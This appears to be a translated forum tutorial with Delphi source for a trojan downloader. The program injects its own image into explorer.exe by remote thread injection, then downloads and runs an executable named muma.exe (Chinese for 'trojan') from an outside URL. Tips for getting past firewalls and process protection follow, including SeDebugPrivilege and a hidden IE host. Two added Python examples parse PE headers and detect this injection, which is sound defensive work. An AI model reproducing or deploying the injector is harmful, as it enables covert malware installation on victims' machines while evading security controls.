The idea for this code comes from Aphex of the overseas group ees. Basically all non-DLL downloaders work this way: they use the same old remote injection method, except that the injected object is not a DLL but the process itself. The code is below. My professional knowledge is limited, so some of the explanations may not be very professional; please take a look, and bear with me where it is unclear.
Program InjectTheSelf;
{$IMAGEBASE $13140000}  // Fixed, unusual base address. The image is copied byte for byte, so it only
                        // works if it sits at the same address in both processes; an odd base makes
                        // it likely that this range is free inside the target.
Uses Windows, UrlMon;

// Download routine: this is the code that ends up running inside the target process.
// Declared as a proper thread start routine (stdcall, one pointer parameter, DWORD result).
// Note that the copied import table is not re-resolved, so it relies on kernel32.dll and
// urlmon.dll being mapped at the same addresses in the target as in this process.
function Download(Param: Pointer): DWORD; stdcall;
Begin
  URLDownloadToFile(nil, 'http://www.mycode.ful.cn/muma.exe', 'C:\muma.exe', 0, nil);
  WinExec('C:\muma.exe', SW_SHOW);  // SW_SHOW or SW_HIDE
  Result := 0;
End;

Var
  SelfBase, RemoteBase: Pointer;
  Extent, Size, ThreadId: LongWord;
  ProcessHandle, Pid: LongWord;
Begin
  // Get the PID of the Explorer process: Shell_TrayWnd is the class name of the taskbar window
  // (you can look such class names up with Spy++).
  GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  // Open the target process with full access.
  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid);
  // Base address of our own image; GetModuleHandle(nil) returns the module base of the running EXE.
  SelfBase := Pointer(GetModuleHandle(nil));
  // Length of the memory image: DOS header -> e_lfanew -> PE signature (DWORD) -> file header
  // -> optional header, whose SizeOfImage field is the size of the mapped image.
  Extent := PImageOptionalHeader(Pointer(Integer(SelfBase) + PImageDosHeader(SelfBase)._lfanew
            + SizeOf(DWORD) + SizeOf(TImageFileHeader))).SizeOfImage;
  // Release whatever the target may have at our base address ...
  VirtualFreeEx(ProcessHandle, SelfBase, 0, MEM_RELEASE);
  // ... and allocate Extent bytes there, at exactly the same address, readable/writable/executable.
  RemoteBase := VirtualAllocEx(ProcessHandle, SelfBase, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // Copy our whole image into the target's memory.
  WriteProcessMemory(ProcessHandle, RemoteBase, SelfBase, Extent, Size);
  // Start Download inside the target. Because the copy sits at the same address, the address
  // @Download is valid there as well; with this the injection is complete.
  CreateRemoteThread(ProcessHandle, nil, 0, @Download, SelfBase, 0, ThreadId);
  // Close the process handle.
  CloseHandle(ProcessHandle);
End.
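To make the SizeOfImage lookup in the code above concrete, here is an added example (not part of the original post) that walks the same header chain over a PE image in Python: MZ header, e_lfanew, PE signature, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER. It also reports the two flags that decide whether a byte-for-byte copy of the image can run at its preferred base, which is what the {$IMAGEBASE $13140000} directive relies on: IMAGE_FILE_RELOCS_STRIPPED in the file header and IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE in the optional header. The sample image is constructed inside the script (headers only, no sections); its values are assumptions for the demonstration.

```python
"""Walk a PE header the way the Delphi code above does and report what the
self-copy injection depends on.  Added example, not code from the original post.
The sample image is constructed below (headers only); its values are assumptions."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D                     # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550                  # 'PE\0\0'
IMAGE_FILE_RELOCS_STRIPPED = 0x0001              # IMAGE_FILE_HEADER.Characteristics
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # OptionalHeader.DllCharacteristics
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5

# Optional-header field offsets that differ between PE32 and PE32+.
_LAYOUT = {
    IMAGE_NT_OPTIONAL_HDR32_MAGIC: dict(image_base=(28, "<I"), datadir=96),
    IMAGE_NT_OPTIONAL_HDR64_MAGIC: dict(image_base=(24, "<Q"), datadir=112),
}


def parse_pe_headers(data: bytes) -> dict:
    """Same chain as the Delphi expression: e_lfanew -> signature -> file header -> optional header."""
    (e_magic,) = struct.unpack_from("<H", data, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    (signature,) = struct.unpack_from("<I", data, e_lfanew)
    if signature != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4                              # sizeof(DWORD) past the signature
    _machine, _nsect, _ts, _sym, _nsym, _opt_size, file_chars = \
        struct.unpack_from("<HHIIIHH", data, file_hdr)
    opt_hdr = file_hdr + 20                              # sizeof(IMAGE_FILE_HEADER)
    (magic,) = struct.unpack_from("<H", data, opt_hdr)
    if magic not in _LAYOUT:
        raise ValueError(f"unknown optional header magic 0x{magic:X}")
    base_off, base_fmt = _LAYOUT[magic]["image_base"]
    (image_base,) = struct.unpack_from(base_fmt, data, opt_hdr + base_off)
    (size_of_image,) = struct.unpack_from("<I", data, opt_hdr + 56)
    (dll_chars,) = struct.unpack_from("<H", data, opt_hdr + 70)
    reloc_dir = opt_hdr + _LAYOUT[magic]["datadir"] + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC
    _reloc_rva, reloc_size = struct.unpack_from("<II", data, reloc_dir)
    return {
        "image_base": image_base,
        "size_of_image": size_of_image,
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "has_relocations": not (file_chars & IMAGE_FILE_RELOCS_STRIPPED) and reloc_size > 0,
    }


def copy_works_at_preferred_base(info: dict) -> bool:
    """The byte-for-byte copy only runs if the image sits at the same address in both
    processes.  Without DYNAMIC_BASE the loader maps it at ImageBase whenever that range
    is free, so the injector can ask VirtualAllocEx for exactly that address."""
    return not info["dynamic_base"]


def build_sample_image(image_base=0x13140000, size_of_image=0x5000,
                       dll_characteristics=0, file_characteristics=0x0103,
                       reloc_dir_size=0) -> bytes:
    """Constructed 32-bit PE header (no sections) for the demonstration; values are assumptions."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, file_characteristics)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 32, 0x1000)            # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)             # FileAlignment
    struct.pack_into("<I", opt, 56, size_of_image)
    struct.pack_into("<I", opt, 60, 0x400)             # SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                 # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<I", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC + 4, reloc_dir_size)
    return bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + bytes(opt)


if __name__ == "__main__":
    samples = [
        ("fixed base, relocations stripped", build_sample_image()),
        ("ASLR-enabled build", build_sample_image(dll_characteristics=0x40,
                                                  file_characteristics=0x0102,
                                                  reloc_dir_size=0x100)),
    ]
    for label, img in samples:
        info = parse_pe_headers(img)
        print(f"{label}: ImageBase=0x{info['image_base']:X} SizeOfImage=0x{info['size_of_image']:X} "
              f"copy works at preferred base: {copy_works_at_preferred_base(info)}")
```

The first sample mirrors a classic Delphi build with a fixed base and no relocation table, the shape the code above needs; the second, with DYNAMIC_BASE set, is the case where the source process itself may already be loaded somewhere other than ImageBase, so a byte copy placed at ImageBase in the target would run with stale absolute addresses. The same walk also applies to a region dumped from a target process when you want to check whether a private RWX range holds a complete image.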
It should be noted that although this is already a firewall-penetrating version of the downloader, it still has quite a few problems. If you want to write your own downloader, please deal with the following points:
1. The remote injection functions used above (OpenProcess with PROCESS_ALL_ACCESS, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) are not available under Windows 9x.
2. Windows and some applications protect certain processes and do not let a process without sufficient rights operate on them. Injecting into svchost, QQ and similar processes requires raising your privileges first (in practice, enabling SeDebugPrivilege on your own token before calling OpenProcess).
3. If you need to inject into IE, first start a hidden IE process with WinExec in SW_HIDE mode, then suspend your program for about 3 seconds before injecting. This is for some older machines.
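From the defender's side, the steps above leave a small number of observable events: a handle to explorer.exe opened with write and thread-creation rights, and a remote thread whose start address is not inside any loaded module (it points into the private region that WriteProcessMemory filled). The following added example, not from the original post, runs that check over a few constructed log records loosely modelled on the fields of Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread); the key=value text layout, the file paths and the sample values are assumptions.

```python
"""Detection check for the self-copy injection described above.  Added example, not
code from the original post.  The records are constructed here, loosely modelled on
Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread) fields; the
key=value text layout and the sample values are assumptions."""
import re

# OpenProcess access bits (winnt.h) that the injector needs on the target.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Hosts the article names as injection targets (explorer.exe owns Shell_TrayWnd).
WATCHED_TARGETS = {"explorer.exe", "iexplore.exe", "svchost.exe"}

# Constructed sample records: a benign pair, then the injector's pair.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\explorer.exe "
    "GrantedAccess=0x1000",
    "EventID=8 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\explorer.exe "
    "StartAddress=0x77A1B2C0 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart",
    "EventID=10 SourceImage=C:\\Users\\test\\injecttheself.exe TargetImage=C:\\Windows\\explorer.exe "
    "GrantedAccess=0x1F0FFF",
    "EventID=8 SourceImage=C:\\Users\\test\\injecttheself.exe TargetImage=C:\\Windows\\explorer.exe "
    "StartAddress=0x13141234 StartModule= StartFunction=",
]

FIELD_RE = re.compile(r"(\w+)=(\S*)")


def parse_event(line: str) -> dict:
    """Split one key=value record into a dict (values contain no spaces in this layout)."""
    return dict(FIELD_RE.findall(line))


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list:
    """Return the reasons a record looks like the injection sequence (empty if benign)."""
    reasons = []
    target = image_name(ev.get("TargetImage", ""))
    if ev.get("EventID") == "10":
        granted = int(ev.get("GrantedAccess", "0"), 16)
        # PROCESS_ALL_ACCESS, as used by the Delphi code, contains all three bits.
        if target in WATCHED_TARGETS and (granted & INJECT_MASK) == INJECT_MASK:
            reasons.append(f"handle to {target} with VM_WRITE|VM_OPERATION|CREATE_THREAD (0x{granted:X})")
    elif ev.get("EventID") == "8":
        if ev.get("StartModule", "") == "":
            # The thread starts in memory no module is mapped at: the region that
            # VirtualAllocEx reserved and WriteProcessMemory filled.
            reasons.append(f"remote thread in {target} starts at {ev.get('StartAddress')} "
                           "outside any loaded module")
            if target in WATCHED_TARGETS:
                reasons.append(f"{target} is a common injection host")
    return reasons


def scan(lines) -> list:
    """Return (EventID, source image name, reasons) for every suspicious record."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            alerts.append((ev["EventID"], image_name(ev.get("SourceImage", "")), reasons))
    return alerts


if __name__ == "__main__":
    for eid, source, reasons in scan(SAMPLE_EVENTS):
        print(f"Event {eid} from {source}:")
        for reason in reasons:
            print("  -", reason)
```

The two rules map directly onto the code above: the first keys on OpenProcess(PROCESS_ALL_ACCESS) against the Explorer PID, the second on CreateRemoteThread with a start address that no loaded module backs. Both also fire for debuggers and some security products that hook other processes, so treat a hit as a triage signal and confirm by dumping the region at the start address and checking whether it holds a complete PE image.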
Build a non-DLL firewall-penetrating downloader